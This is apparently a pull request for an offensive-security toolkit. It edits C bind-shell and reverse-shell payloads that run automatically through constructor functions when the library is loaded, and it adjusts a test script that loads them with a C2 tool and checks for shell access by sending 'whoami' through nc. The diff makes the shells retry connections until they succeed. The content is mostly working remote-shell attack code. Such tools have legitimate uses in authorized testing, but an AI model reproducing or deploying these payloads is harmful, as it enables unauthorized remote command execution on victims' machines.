### PR TITLE
Fixing test suite and changing delays

### DIFF
--- a/payloads/bind_shell.c
+++ b/payloads/bind_shell.c
@@ -16,9 +16,11 @@ void __attribute__((constructor)) bind_shell(){
   host_addr.sin_family = AF_INET;
   host_addr.sin_port = htons(port);
   host_addr.sin_addr.s_addr = addr;
-  bind(host_sock, (struct sockaddr *)&host_addr, sizeof(host_addr));
+  // Keep trying to connect until connection is established
+  while( bind(host_sock, (struct sockaddr *)&host_addr, sizeof(host_addr)) != 0){
+    usleep(500000);
+  }
   listen(host_sock, 0);
-
   // accept incoming connection
   int client_sock = accept(host_sock, NULL, NULL);
 

--- a/payloads/reverse_shell.c
+++ b/payloads/reverse_shell.c
@@ -9,7 +9,6 @@
 
 void __attribute__((constructor)) reverse_shell(){ 
   int socket_fd;
-  int connection = -1;
   int pid;
   struct sockaddr_in server;  
 
@@ -20,9 +19,8 @@ void __attribute__((constructor)) reverse_shell(){
   server.sin_addr.s_addr = inet_addr(addr);
 
   // loop until connection is established
-  while(connection < 0){
-    sleep(5);
-    connection = connect(socket_fd, (struct sockaddr *)&server, sizeof(struct sockaddr));
+  while( connect(socket_fd, (struct sockaddr *)&server, sizeof(struct sockaddr)) != 0){
+    usleep(500000);
   }
 
   // fork process && copy stdin, stdout & stderr to client socket

--- a/test-suite/test.sh
+++ b/test-suite/test.sh
@@ -9,7 +9,7 @@ cd src/
 
 ./test > /dev/null
 ../tools/c2/c2 ../payloads/bind_shell.so
-output=$(echo -e "whoami \n exit" | nc localhost 1234)
+output=$((echo -e "whoami\nexit\n" | nc localhost 1234) 2> /dev/null)
 if [ "$output" != "$user" ]
 then
     echo "Bind Shell Test Failed"
@@ -17,11 +17,10 @@ else
     echo "Bind Shell Test Passed"
 fi
 
-sleep 60
 killall test 2> /dev/null
 ./test > /dev/null
 ../tools/c2/c2 ../payloads/reverse_shell.so
-output=$((echo -e "whoami \n exit" | nc -lp 1234 ) 2> /dev/null)
+output=$((echo -e "whoami\nexit\n" | nc -lp 1234 ) 2> /dev/null)
 if [ "$output" != "$user" ]
 then
     echo "Reverse Shell Test Failed"


### PR DESCRIPTION
I fixed the test suite with an extra \n. Everything works now. I put the bind in the bind_shell.c into a while loop to make sure a connection is established. Cleaned up extra variable called connection. Changed from sleep(5) to usleep(500000). That is 0.5 seconds. You can change it back if you like.